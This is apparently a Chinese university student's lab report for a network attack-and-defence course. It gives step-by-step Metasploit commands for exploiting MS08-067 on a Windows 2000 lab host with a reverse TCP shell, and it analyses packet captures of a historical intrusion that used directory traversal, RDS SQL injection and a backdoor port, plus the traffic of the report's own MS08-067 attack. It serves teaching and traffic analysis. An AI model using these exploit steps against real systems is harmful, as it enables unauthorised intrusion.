20199316 2019-2020-2 《网络攻防实践》第7周作业

1.实践内容

总结一下本周学习内容并介绍下实践内容，不要复制粘贴

2.实践过程

主机	ip地址
A_kali	192.168.200.2
B_B_win2k server	192.168.200.124

实践一

1：在kali打开metasploit，输入 msfconsole ,回车后就会进入到他的控制台界面，然后先搜索一下ms08_067漏洞。

search ms08_067    //search+漏洞名字
use exploit/windows/smb/ms08_067_netapi

2：选择攻击负载模块，可以通过输入 show payloads ，然后找到你要用的攻击负载模块，kali大概有100多个选择3反转tcp，注意，这一步一定要先show完payload，出现列表后再输入 set PAYLOAD generic/shell_reverse_tcp 。

3：然后设置攻击目标，通过命令 set RHOST 192.168.200.124,设置攻击地址，通过命令 set LHOST 192.168.200.2

4：设置目标操作系统平台类型，这个选择0就行，0代表自动匹配

set TARGET 0

5:输入 exploit 开始攻击。攻击结果如下图

6：攻击成功后，发现进入了靶机的cmd页面上，那么说明我们进入了靶机，可以输入ipconfig查看一下靶机ip，验证了我们的攻击是否成功。

实践二

1：首先用wireshark打开那个.log文件。发现有很多http报文。先使用wireshark自带的统计工具，点击 统计->http->请求 。就会得到下图。我们知道，访问网页的时候，会从网页服务器下载很多文件到本地，从这个统计图可以看到。那个框出的部分应该就是这次的攻击代码了。

2：接下来设置限定条件为：ip.addr==172.16.1.106 and http。然后就开始往下翻。编号为117的这一行发现有一些奇怪的路径，如下图。

这个boot.ini是NT系统的启动文件。而前面的..%c0af..查阅资料后得知，这是"/"的Unicode编码。
3：再往下看，我们可以看到攻击者试图向服务器获取一个msadcs.dll文件。

4：攻击者利用这个dll存在RDS漏洞，输入了个数据查询语句进行SQL注入攻击。根据ADM!ROX..以及那个mdb。

5：然后攻击者就成功进入了系统。往下拉，可以看到攻击者建立了一个ftp连接。输入了用户名密码，并且下载了几个文件。

6：然后攻击者连接6969端口，获得了访问权限

7：从1444编号开始，攻击机发起了多次SQL注入攻击，我们发现数据部分不太一样。图中出现了一个pdumo.exe。

8：然后在编号2339追踪http流，我们可以看到，根据add，他应该是想提升权限

9：如何防止这些攻击

首先是打补丁，漏洞一定会在官方补丁之后公开，及时打补丁就没有危害了。
利用安全清单插件来固化网络
通过漏洞扫描软件来标识存在的漏洞
网站根目录和系统目录进行物理隔离。

实践三

1：攻击步骤跟实践1是一样的，攻击的漏洞依然是ms08_067漏洞，这里不在赘述了。我们要做的就是在攻击机输入exploit之后，敲回车之前，wireshark实时监听经过网卡的数据包。由于靶机没有wireshark，所以我选择用kali上的wireshark监听。效果一样的。
从下图可以看出攻击者ip地址192.168.200.2，端口34869，靶机ip地址192.168.200.124，端口445等信息

2:可见攻击从ARP开始，由192.168.200.2 39614端口到192.168.200.124 445端口，MS08-067漏洞是通过MSRPC over SMB通道调用Server服务程序中的NetPathCanonicalize函数时触发的。所以据这么多SMB数据包可以推断出，是利用这个漏洞攻击的

3：然后这时候我们在攻击机输入个ipconfig命令，会显示如下结果。